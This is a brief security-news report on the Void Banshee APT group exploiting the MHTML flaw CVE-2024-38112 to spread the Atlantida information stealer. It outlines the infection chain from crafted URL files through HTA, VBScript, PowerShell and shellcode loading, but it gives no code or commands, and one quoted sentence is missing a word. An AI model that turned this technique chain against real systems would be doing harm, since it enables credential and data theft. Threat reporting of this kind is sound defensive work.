Security News > 2024 > July > Void Banshee APT Exploits Microsoft MHTML Flaw to Spread Atlantida Stealer

An advanced persistent threat group called Void Banshee has been observed exploiting a recently disclosed security flaw in the Microsoft MHTML browser engine as a zero-day to deliver an information stealer called Atlantida.

"Variations of the Atlantida campaign have been highly active throughout 2024 and have evolved to use CVE-2024-38112 as part of Void Banshee infection chains," security researchers Peter Girnus and Aliakbar Zahravi said.

"The ability of APT groups like Void Banshee to exploit disabled services such as poses a significant threat to organizations worldwide."

Opening the HTA file results in the execution of a Visual Basic Script that, in turn, downloads and runs a PowerShell script responsible for retrieving a.NET trojan loader, which ultimately uses the Donut shellcode project to decrypt and execute the Atlantida stealer inside RegAsm.

"By using specially crafted URL files that contained the MHTML protocol handler and the x-usc! directive, Void Banshee was able to access and run HTML Application files directly through the disabled IE process," the researchers said.

Not much is known about Void Banshee other than the fact that it has a history of targeting North American, European, and Southeast Asian regions for information theft and financial gain.

News URL

https://thehackernews.com/2024/07/void-banshee-apt-exploits-microsoft.html